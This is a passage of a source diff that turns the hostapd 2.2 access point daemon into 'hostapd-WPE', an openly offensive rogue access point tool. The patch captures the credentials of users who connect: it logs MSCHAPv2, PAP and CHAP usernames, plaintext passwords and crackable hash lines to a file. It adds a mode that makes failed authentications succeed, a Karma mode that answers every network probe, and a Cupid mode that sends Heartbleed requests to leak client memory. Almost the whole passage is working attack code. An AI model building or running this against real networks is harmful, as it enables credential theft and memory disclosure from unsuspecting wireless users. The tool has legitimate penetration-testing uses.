+ "hostapd v" VERSION_STR "\n"
"User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2014, Jouni Malinen <j@w1.fi> "
- "and contributors\n");
+ "and contributors\n"
+ "-----------------------------------------------------\n"
+ "WPE (Wireless Pwnage Edition)\n"
+ "This version has been cleverly modified to target\n"
+ "wired and wireless users.\n"
+ "Brad Antoniewicz <@brad_anton>\n"
+ "Foundstone\n");
}
@@ -425,7 +431,7 @@ static void usage(void)
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
+ "usage: hostapd [-hdBKtvskc] [-P <PID file>] [-e <entropy file>] "
"\\\n"
" [-g <global ctrl_iface>] [-G <group>] \\\n"
" <configuration file(s)>\n"
@@ -447,7 +453,12 @@ static void usage(void)
" (records all messages regardless of debug verbosity)\n"
#endif /* CONFIG_DEBUG_LINUX_TRACING */
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n\n"
+ " WPE Options -------------------\n"
+ " (credential logging always enabled)\n"
+ " -s Return Success where possible\n"
+ " -k Karma Mode (Respond to all probes)\n"
+ " -c Cupid Mode (Heartbleed clients)\n\n");
exit(1);
}
@@ -554,7 +565,7 @@ int main(int argc, char *argv[])
interfaces.global_ctrl_sock = -1;
for (;;) {
- c = getopt(argc, argv, "b:Bde:f:hKP:Ttu:vg:G:");
+ c = getopt(argc, argv, "b:Bde:f:hKP:Ttu:vg:G:kcs");
if (c < 0)
break;
switch (c) {
@@ -615,6 +626,15 @@ int main(int argc, char *argv[])
case 'u':
return gen_uuid(optarg);
#endif /* CONFIG_WPS */
+ case 'k':
+ wpe_conf.wpe_enable_karma++;
+ break;
+ case 'c':
+ wpe_conf.wpe_enable_cupid++;
+ break;
+ case 's':
+ wpe_conf.wpe_enable_return_success++;
+ break;
default:
usage();
break;
diff -rupN hostapd-2.2/hostapd/Makefile hostapd-2.2-wpe/hostapd/Makefile
--- hostapd-2.2/hostapd/Makefile 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/hostapd/Makefile 2014-08-14 08:45:54.641127921 -0400
@@ -59,6 +59,7 @@ OBJS += ../src/ap/preauth_auth.o
OBJS += ../src/ap/pmksa_cache_auth.o
OBJS += ../src/ap/ieee802_11_shared.o
OBJS += ../src/ap/beacon.o
+OBJS += ../src/wpe/wpe.o
OBJS_c = hostapd_cli.o ../src/common/wpa_ctrl.o ../src/utils/os_$(CONFIG_OS).o
@@ -913,15 +914,15 @@ install: all
BCHECK=../src/drivers/build.hostapd
-hostapd: $(BCHECK) $(OBJS)
- $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS)
+hostapd: $(BCHECK) $(OBJS)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS)
@$(E) " LD " $@
ifdef CONFIG_WPA_TRACE
OBJS_c += ../src/utils/trace.o
endif
-hostapd_cli: $(OBJS_c)
- $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c)
+hostapd_cli: $(OBJS_c)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c)
@$(E) " LD " $@
NOBJS = nt_password_hash.o ../src/crypto/ms_funcs.o $(SHA1OBJS) ../src/crypto/md5.o
diff -rupN hostapd-2.2/src/ap/beacon.c hostapd-2.2-wpe/src/ap/beacon.c
--- hostapd-2.2/src/ap/beacon.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/ap/beacon.c 2014-08-14 08:45:54.641127921 -0400
@@ -28,7 +28,7 @@
#include "beacon.h"
#include "hs20.h"
#include "dfs.h"
-
+#include "wpe/wpe.h"
#ifdef NEED_AP_MLME
@@ -582,6 +582,13 @@ void handle_probe_req(struct hostapd_dat
}
#endif /* CONFIG_P2P */
+ if (wpe_conf.wpe_enable_karma && elems.ssid_len > 0) {
+ wpa_printf(MSG_MSGDUMP,"[WPE] Probe request from " MACSTR ", changing SSID to '%s'", MAC2STR(mgmt->sa), wpa_ssid_txt(elems.ssid, elems.ssid_len));
+ hostapd_set_ssid(hapd,elems.ssid,elems.ssid_len);
+ os_memcpy(&hapd->conf->ssid.ssid,elems.ssid,elems.ssid_len);
+ hapd->conf->ssid.ssid_len = elems.ssid_len;
+ }
+
res = ssid_match(hapd, elems.ssid, elems.ssid_len,
elems.ssid_list, elems.ssid_list_len);
if (res != NO_SSID_MATCH) {
diff -rupN hostapd-2.2/src/ap/ieee802_11.c hostapd-2.2-wpe/src/ap/ieee802_11.c
--- hostapd-2.2/src/ap/ieee802_11.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/ap/ieee802_11.c 2014-08-14 08:45:54.641127921 -0400
@@ -39,7 +39,7 @@
#include "wnm_ap.h"
#include "ieee802_11.h"
#include "dfs.h"
-
+#include "wpe/wpe.h"
u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid)
{
@@ -790,8 +790,8 @@ static u16 check_ssid(struct hostapd_dat
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ if ((!wpe_conf.wpe_enable_karma) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
HOSTAPD_LEVEL_INFO,
"Station tried to associate with unknown SSID "
diff -rupN hostapd-2.2/src/crypto/ms_funcs.c hostapd-2.2-wpe/src/crypto/ms_funcs.c
--- hostapd-2.2/src/crypto/ms_funcs.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/crypto/ms_funcs.c 2014-08-14 08:45:54.649128041 -0400
@@ -78,7 +78,7 @@ static int utf8_to_ucs2(const u8 *utf8_s
* @challenge: 8-octet Challenge (OUT)
* Returns: 0 on success, -1 on failure
*/
-static int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
const u8 *username, size_t username_len,
u8 *challenge)
{
diff -rupN hostapd-2.2/src/crypto/ms_funcs.h hostapd-2.2-wpe/src/crypto/ms_funcs.h
--- hostapd-2.2/src/crypto/ms_funcs.h 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/crypto/ms_funcs.h 2014-08-14 08:45:54.649128041 -0400
@@ -9,6 +9,10 @@
#ifndef MS_FUNCS_H
#define MS_FUNCS_H
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ const u8 *username, size_t username_len,
+ u8 *challenge);
+
int generate_nt_response(const u8 *auth_challenge, const u8 *peer_challenge,
const u8 *username, size_t username_len,
const u8 *password, size_t password_len,
diff -rupN hostapd-2.2/src/crypto/tls_openssl.c hostapd-2.2-wpe/src/crypto/tls_openssl.c
--- hostapd-2.2/src/crypto/tls_openssl.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/crypto/tls_openssl.c 2014-08-14 08:45:54.653128013 -0400
@@ -20,6 +20,7 @@
#include <openssl/err.h>
#include <openssl/pkcs12.h>
#include <openssl/x509v3.h>
+#include <openssl/rand.h>
#ifndef OPENSSL_NO_ENGINE
#include <openssl/engine.h>
#endif /* OPENSSL_NO_ENGINE */
@@ -28,6 +29,8 @@
#include "crypto.h"
#include "tls.h"
+#include "wpe/wpe.h"
+
#if OPENSSL_VERSION_NUMBER >= 0x0090800fL
#define OPENSSL_d2i_TYPE const unsigned char **
#else
@@ -71,6 +74,8 @@ static BIO * BIO_from_keystore(const cha
}
#endif /* ANDROID */
+int wpe_hb_enc(struct tls_connection *conn); // WPE: To limit changes up top
+
static int tls_openssl_ref_count = 0;
struct tls_context {
@@ -1029,7 +1034,10 @@ struct tls_connection * tls_connection_i
conn->context = context;
SSL_set_app_data(conn->ssl, conn);
- SSL_set_msg_callback(conn->ssl, tls_msg_cb);
+ if (wpe_conf.wpe_enable_cupid)
+ SSL_set_msg_callback(conn->ssl, wpe_hb_cb);
+ else
+ SSL_set_msg_callback(conn->ssl, tls_msg_cb);
SSL_set_msg_callback_arg(conn->ssl, conn);
options = SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 |
SSL_OP_SINGLE_DH_USE;
@@ -2552,8 +2560,10 @@ static struct wpabuf *
openssl_handshake(struct tls_connection *conn, const struct wpabuf *in_data,
int server)
{
- int res;
+ int res,i;
struct wpabuf *out_data;
+ struct wpabuf *wpe_hb_ptr1, *wpe_hb_ptr2;
+
/*
* Give TLS handshake data from the server (if available) to OpenSSL
@@ -2613,6 +2623,25 @@ openssl_handshake(struct tls_connection
}
wpabuf_put(out_data, res);
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_handshake && wpe_conf.wpe_hb_num_tries) {
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat request instead of handshake\n");
+ wpe_hb_ptr1 = NULL;
+ for (i=0; i < wpe_conf.wpe_hb_num_repeats; i++) {
+ wpe_hb_ptr2 = wpabuf_alloc(wpe_hb_msg_len-1);
+ memcpy(wpabuf_mhead(wpe_hb_ptr2), (u8 *)wpe_hb_clear(), wpe_hb_msg_len-1);
+ wpabuf_put(wpe_hb_ptr2, wpe_hb_msg_len-1);
+ if (wpe_hb_ptr1) {
+ wpe_hb_ptr1 = wpabuf_concat(wpe_hb_ptr1,wpe_hb_ptr2);
+ } else {
+ wpe_hb_ptr1 = wpe_hb_ptr2;
+ }
+ }
+ conn->ssl->tlsext_hb_pending = 1;
+ wpe_conf.wpe_hb_num_tries--;
+ return wpe_hb_ptr1;
+ }
+
return out_data;
}
@@ -2722,6 +2751,10 @@ struct wpabuf * tls_connection_encrypt(v
tls_show_errors(MSG_INFO, __func__, "BIO_reset failed");
return NULL;
}
+
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_appdata)
+ wpe_hb_enc(conn);
+
res = SSL_write(conn->ssl, wpabuf_head(in_data), wpabuf_len(in_data));
if (res < 0) {
tls_show_errors(MSG_INFO, __func__,
@@ -2729,6 +2762,10 @@ struct wpabuf * tls_connection_encrypt(v
return NULL;
}
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_after_appdata)
+ wpe_hb_enc(conn);
+
+
/* Read encrypted data to be sent to the server */
buf = wpabuf_alloc(wpabuf_len(in_data) + 300);
if (buf == NULL)
@@ -3544,3 +3581,63 @@ int tls_connection_set_session_ticket_cb
return -1;
#endif /* EAP_FAST || EAP_FAST_DYNAMIC || EAP_SERVER_FAST */
}
+
+int wpe_hb_enc(struct tls_connection *conn) {
+ unsigned char *cbuf, *p;
+
+ unsigned int real_payload = 18; //default: 18 /* Sequence number + random bytes */
+ unsigned int padding = 16; //default: 16 /* Use minimum padding */
+
+ if (!SSL_is_init_finished(conn->ssl)) {
+ return -1;
+ }
+
+ if(!conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
+ conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS) {
+ wpa_printf(MSG_DEBUG, "[WPE] warning: heartbeat extension is unsupported (try anyway)\n");
+ } else {
+ wpa_printf(MSG_DEBUG,"[WPE] Heartbeat extention is supported, may not be vulnerable!\n");
+ }
+
+ /* Check if padding is too long, payload and padding
+ * must not exceed 2^14 - 3 = 16381 bytes in total.
+ */
+ OPENSSL_assert(real_payload + padding <= 16381);
+
+ cbuf = OPENSSL_malloc(1 + 2 + real_payload + padding);
+
+ if(cbuf==NULL)
+ return -1;
+
+ p = cbuf;
+
+ *p++ = TLS1_HB_REQUEST;
+
+
+ /* Payload length (18 bytes here) */
+ //s2n(payload, p); /* standards compliant payload */
+ //s2n(payload +10, p); /* >payload to exploit heartbleed!!! */
+ s2n(wpe_conf.wpe_hb_payload_size, p); /* configured payload */
+
+ /* Sequence number */
+ s2n(conn->ssl->tlsext_hb_seq, p);
+ /* 16 random bytes */
+ RAND_pseudo_bytes(p, 16);
+ //RAND_bytes(p, 16);
+ p += 16;
+ /* Random padding */
+ RAND_pseudo_bytes(p, padding);
+ //RAND_bytes(p, padding);
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat reaquesting payload size %u...\n", wpe_conf.wpe_hb_payload_size);
+ wpa_hexdump(MSG_DEBUG, "[WPE] heartbeat packet to send:", cbuf, 1 + 2 + real_payload + padding);
+
+ /* Send heartbeat request */
+ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, TLS1_RT_HEARTBEAT,
+ cbuf, 3 + real_payload + padding) >= 0)
+ conn->ssl->tlsext_hb_pending = 1;
+ OPENSSL_free(cbuf);
+
+ return 0;
+}
+
diff -rupN hostapd-2.2/src/eap_server/eap_server.c hostapd-2.2-wpe/src/eap_server/eap_server.c
--- hostapd-2.2/src/eap_server/eap_server.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/eap_server/eap_server.c 2014-08-14 08:45:54.653128013 -0400
@@ -22,7 +22,8 @@
#define STATE_MACHINE_DATA struct eap_sm
#define STATE_MACHINE_DEBUG_PREFIX "EAP"
-#define EAP_MAX_AUTH_ROUNDS 50
+//#define EAP_MAX_AUTH_ROUNDS 50
+#define EAP_MAX_AUTH_ROUNDS 50000 // wpe >:)
static void eap_user_free(struct eap_user *user);
@@ -95,6 +96,8 @@ int eap_user_get(struct eap_sm *sm, cons
{
struct eap_user *user;
+ char ident = 't';
+
if (sm == NULL || sm->eapol_cb == NULL ||
sm->eapol_cb->get_eap_user == NULL)
return -1;
@@ -106,6 +109,11 @@ int eap_user_get(struct eap_sm *sm, cons
if (user == NULL)
return -1;
+ if (phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
+
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
diff -rupN hostapd-2.2/src/eap_server/eap_server_mschapv2.c hostapd-2.2-wpe/src/eap_server/eap_server_mschapv2.c
--- hostapd-2.2/src/eap_server/eap_server_mschapv2.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/eap_server/eap_server_mschapv2.c 2014-08-14 08:45:54.653128013 -0400
@@ -12,7 +12,7 @@
#include "crypto/ms_funcs.h"
#include "crypto/random.h"
#include "eap_i.h"
-
+#include "wpe/wpe.h"
struct eap_mschapv2_hdr {
u8 op_code; /* MSCHAPV2_OP_* */
@@ -291,7 +291,7 @@ static void eap_mschapv2_process_respons
size_t username_len, user_len;
int res;
char *buf;
-
+ u8 wpe_challenge_hash[8];
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
if (pos == NULL || len < 1)
@@ -329,6 +329,8 @@ static void eap_mschapv2_process_respons
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ challenge_hash(peer_challenge, data->auth_challenge, name, name_len, wpe_challenge_hash);
+ wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24);
buf = os_malloc(name_len * 4 + 1);
if (buf) {
@@ -393,6 +395,11 @@ static void eap_mschapv2_process_respons
return;
}
+ if (wpe_conf.wpe_enable_return_success) {
+ os_memset((void *)nt_response, 0, 24);
+ os_memset((void *)expected, 0, 24);
+ }
+
if (os_memcmp(nt_response, expected, 24) == 0) {
const u8 *pw_hash;
u8 pw_hash_buf[16], pw_hash_hash[16];
@@ -430,6 +437,8 @@ static void eap_mschapv2_process_respons
wpa_printf(MSG_DEBUG, "EAP-MSCHAPV2: Invalid NT-Response");
data->state = FAILURE_REQ;
}
+ if (wpe_conf.wpe_enable_return_success)
+ data->state = SUCCESS;
}
diff -rupN hostapd-2.2/src/eap_server/eap_server_peap.c hostapd-2.2-wpe/src/eap_server/eap_server_peap.c
--- hostapd-2.2/src/eap_server/eap_server_peap.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/eap_server/eap_server_peap.c 2014-08-14 08:45:54.653128013 -0400
@@ -17,7 +17,7 @@
#include "eap_common/eap_tlv_common.h"
#include "eap_common/eap_peap_common.h"
#include "tncs.h"
-
+#include "wpe/wpe.h"
/* Maximum supported PEAP version
* 0 = Microsoft's PEAP version 0; draft-kamath-pppext-peapv0-00.txt
@@ -850,7 +850,7 @@ auth_method:
eap_peap_state(data, PHASE2_METHOD);
next_type = sm->user->methods[0].method;
sm->user_eap_method_index = 1;
- wpa_printf(MSG_DEBUG, "EAP-PEAP: try EAP type %d", next_type);
+ wpa_printf(MSG_DEBUG, "EAP-PEAPa: try EAP type %d", next_type);
eap_peap_phase2_init(sm, data, next_type);
}
#endif /* EAP_SERVER_TNC */
@@ -969,8 +969,8 @@ static void eap_peap_process_phase2_resp
break;
}
#endif /* EAP_SERVER_TNC */
-
- eap_peap_state(data, PHASE2_METHOD);
+ eap_peap_state(data, PHASE2_METHOD);
+ //data->tlv_request = TLV_REQ_SUCCESS ;
next_type = sm->user->methods[0].method;
sm->user_eap_method_index = 1;
wpa_printf(MSG_DEBUG, "EAP-PEAP: try EAP type %d", next_type);
@@ -986,8 +986,7 @@ static void eap_peap_process_phase2_resp
__func__, data->state);
break;
}
-
- eap_peap_phase2_init(sm, data, next_type);
+ eap_peap_phase2_init(sm, data, next_type);
}
diff -rupN hostapd-2.2/src/eap_server/eap_server_ttls.c hostapd-2.2-wpe/src/eap_server/eap_server_ttls.c
--- hostapd-2.2/src/eap_server/eap_server_ttls.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/eap_server/eap_server_ttls.c 2014-08-14 08:45:54.657127982 -0400
@@ -16,7 +16,7 @@
#include "eap_server/eap_tls_common.h"
#include "eap_common/chap.h"
#include "eap_common/eap_ttls.h"
-
+#include "wpe/wpe.h"
#define EAP_TTLS_VERSION 0
@@ -508,9 +508,11 @@ static void eap_ttls_process_phase2_pap(
return;
}
- if (sm->user->password_len != user_password_len ||
+ wpe_log_basic("eap-ttls/pap", sm->identity, sm->identity_len, user_password, user_password_len);
+
+ if ((!wpe_conf.wpe_enable_return_success) && (sm->user->password_len != user_password_len ||
os_memcmp(sm->user->password, user_password, user_password_len) !=
- 0) {
+ 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: Invalid user password");
eap_ttls_state(data, FAILURE);
return;
@@ -570,8 +572,10 @@ static void eap_ttls_process_phase2_chap
/* MD5(Ident + Password + Challenge) */
chap_md5(password[0], sm->user->password, sm->user->password_len,
challenge, challenge_len, hash);
+
+ wpe_log_chalresp("eap-ttls/chap", sm->identity, sm->identity_len, challenge, challenge_len, password, password_len);
- if (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0) {
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/CHAP: Correct user password");
eap_ttls_state(data, SUCCESS);
} else {
@@ -630,8 +634,11 @@ static void eap_ttls_process_phase2_msch
else
nt_challenge_response(challenge, sm->user->password,
sm->user->password_len, nt_response);
+
+ wpe_log_chalresp("eap-ttls/mschap", sm->identity, sm->identity_len, challenge, challenge_len, response + 2 + 24, 24);
+
- if (os_memcmp(nt_response, response + 2 + 24, 24) == 0) {
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(nt_response, response + 2 + 24, 24) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAP: Correct response");
eap_ttls_state(data, SUCCESS);
} else {
@@ -652,7 +659,7 @@ static void eap_ttls_process_phase2_msch
u8 *response, size_t response_len)
{
u8 *chal, *username, nt_response[24], *rx_resp, *peer_challenge,
- *auth_challenge;
+ *auth_challenge, wpe_challenge_hash[8];
size_t username_len, i;
if (challenge == NULL || response == NULL ||
@@ -734,8 +741,11 @@ static void eap_ttls_process_phase2_msch
sm->user->password_len,
nt_response);
}
+ rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8;
+
+ challenge_hash(peer_challenge, auth_challenge, username, username_len, wpe_challenge_hash);
+ wpe_log_chalresp("eap-ttls/mschapv2", username, username_len, wpe_challenge_hash, 8, rx_resp, 24);
- rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8;
if (os_memcmp(nt_response, rx_resp, 24) == 0) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAPV2: Correct "
"NT-Response");
diff -rupN hostapd-2.2/src/Makefile hostapd-2.2-wpe/src/Makefile
--- hostapd-2.2/src/Makefile 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/Makefile 2014-08-14 08:45:54.657127982 -0400
@@ -1,4 +1,4 @@
-SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps
+SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps wpe
all:
for d in $(SUBDIRS); do [ -d $$d ] && $(MAKE) -C $$d; done
diff -rupN hostapd-2.2/src/utils/wpa_debug.c hostapd-2.2-wpe/src/utils/wpa_debug.c
--- hostapd-2.2/src/utils/wpa_debug.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/utils/wpa_debug.c 2014-08-14 08:45:54.657127982 -0400
@@ -30,7 +30,7 @@ static FILE *wpa_debug_tracing_file = NU
int wpa_debug_level = MSG_INFO;
-int wpa_debug_show_keys = 0;
+int wpa_debug_show_keys = 1; // WPE >:)
int wpa_debug_timestamp = 0;
diff -rupN hostapd-2.2/src/wpe/Makefile hostapd-2.2-wpe/src/wpe/Makefile
--- hostapd-2.2/src/wpe/Makefile 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.2-wpe/src/wpe/Makefile 2014-08-14 08:45:54.657127982 -0400
@@ -0,0 +1,8 @@
+all:
+ @echo Nothing to be made.
+
+clean:
+ rm -f *~ *.o *.d *.gcno *.gcda *.gcov
+
+install:
+ @echo Nothing to be made.
diff -rupN hostapd-2.2/src/wpe/wpe.c hostapd-2.2-wpe/src/wpe/wpe.c
--- hostapd-2.2/src/wpe/wpe.c 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.2-wpe/src/wpe/wpe.c 2014-08-14 08:47:02.353123957 -0400
@@ -0,0 +1,209 @@
+/*
+ wpe.c -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks that have been modified to some extend.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+
+#include <time.h>
+#include <openssl/ssl.h>
+#include "includes.h"
+#include "common.h"
+#include "wpe/wpe.h"
+#include "utils/wpa_debug.h"
+
+#define wpe_logfile_default_location "./hostapd-wpe.log"
+
+
+#define MSCHAPV2_CHAL_HASH_LEN 8
+#define MSCHAPV2_CHAL_LEN 16
+#define MSCHAPV2_RESP_LEN 24
+
+char wpe_hb_msg[] = "\x18\x03\x01\x00\x03\x01\xff\xff";
+size_t wpe_hb_msg_len = sizeof(wpe_hb_msg)/sizeof(wpe_hb_msg[0]);
+
+struct wpe_config wpe_conf = {
+ .wpe_logfile = wpe_logfile_default_location,
+ .wpe_logfile_fp = NULL,
+ .wpe_enable_karma = 0,
+ .wpe_enable_cupid = 0,
+ .wpe_enable_return_success = 0,
+ .wpe_hb_send_before_handshake = 1,
+ .wpe_hb_send_before_appdata = 0,
+ .wpe_hb_send_after_appdata = 0,
+ .wpe_hb_payload_size = 50000,
+ .wpe_hb_num_tries = 1,
+ .wpe_hb_num_repeats = 10
+};
+
+void wpe_log_file_and_stdout(char const *fmt, ...) {
+
+ if ( wpe_conf.wpe_logfile_fp == NULL ) {
+ wpe_conf.wpe_logfile_fp = fopen(wpe_conf.wpe_logfile, "a");
+ if ( wpe_conf.wpe_logfile_fp == NULL )
+ printf("WPE: Cannot file log file");
+ }
+
+ va_list ap;
+
+ va_start(ap, fmt);
+ vprintf(fmt, ap);
+ va_end(ap);
+
+ va_start(ap, fmt);
+ if ( wpe_conf.wpe_logfile_fp != NULL )
+ vfprintf(wpe_conf.wpe_logfile_fp, fmt, ap);
+ va_end(ap);
+}
+
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s", type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
+ wpe_log_file_and_stdout("\t challenge:\t");
+ for (x=0; x<challenge_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",challenge[x]);
+ wpe_log_file_and_stdout("%02x\n",challenge[x]);
+
+ wpe_log_file_and_stdout("\t response:\t");
+ for (x=0; x<response_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",response[x]);
+ wpe_log_file_and_stdout("%02x\n",response[x]);
+
+ if (strncmp(type, "mschapv2", 8) == 0 || strncmp(type, "eap-ttls/mschapv2", 17) == 0) {
+ wpe_log_file_and_stdout("\t jtr NETNTLM:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout(":$NETNTLM$");
+
+ for (x=0; x<challenge_len; x++)
+ wpe_log_file_and_stdout("%02x",challenge[x]);
+ wpe_log_file_and_stdout("$");
+ for (x=0; x<response_len; x++)
+ wpe_log_file_and_stdout("%02x",response[x]);
+ wpe_log_file_and_stdout("\n");
+ }
+}
+
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s",type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
+ wpe_log_file_and_stdout("\t password:\t");
+ for (x=0; x<password_len; x++)
+ wpe_log_file_and_stdout("%c",password[x]);
+ wpe_log_file_and_stdout("\n");
+}
+
+/*
+ Taken from asleap, who took from nmap, who took from tcpdump :)
+*/
+void wpe_hexdump(unsigned char *bp, unsigned int length)
+{
+
+ /* stolen from tcpdump, then kludged extensively */
+
+ static const char asciify[] =
+ "................................ !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................................................................................................................";
+
+ const unsigned short *sp;
+ const unsigned char *ap;
+ unsigned int i, j;
+ int nshorts, nshorts2;
+ int padding;
+
+ wpe_log_file_and_stdout("\n\t");
+ padding = 0;
+ sp = (unsigned short *)bp;
+ ap = (unsigned char *)bp;
+ nshorts = (unsigned int)length / sizeof(unsigned short);
+ nshorts2 = (unsigned int)length / sizeof(unsigned short);
+ i = 0;
+ j = 0;
+ while (1) {
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" %04x", ntohs(*sp));
+ sp++;
+ if ((++i % 8) == 0)
+ break;
+ }
+ if (nshorts < 0) {
+ if ((length & 1) && (((i - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout(" %02x ", *(unsigned char *)sp);
+ padding++;
+ }
+ nshorts = (8 - (nshorts2 - nshorts));
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" ");
+ }
+ if (!padding)
+ wpe_log_file_and_stdout(" ");
+ }
+ wpe_log_file_and_stdout(" ");
+
+ while (--nshorts2 >= 0) {
+ wpe_log_file_and_stdout("%c%c", asciify[*ap], asciify[*(ap + 1)]);
+ ap += 2;
+ if ((++j % 8) == 0) {
+ wpe_log_file_and_stdout("\n\t");
+ break;
+ }
+ }
+ if (nshorts2 < 0) {
+ if ((length & 1) && (((j - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout("%c", asciify[*ap]);
+ }
+ break;
+ }
+ }
+ if ((length & 1) && (((i - 1) % 8) == 0)) {
+ wpe_log_file_and_stdout(" %02x", *(unsigned char *)sp);
+ wpe_log_file_and_stdout(" %c",
+ asciify[*ap]);
+ }
+ wpe_log_file_and_stdout("\n");
+}
+
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg) {
+ if (v_content_type == TLS1_RT_HEARTBEAT) {
+ wpe_log_file_and_stdout("\n\nHeartbleed Data:\n");
+ v_ssl->tlsext_hb_pending = 1;
+ wpe_hexdump((unsigned char *)v_buf, v_len);
+ }
+}
+
+
+char *wpe_hb_clear() {
+ char *p;
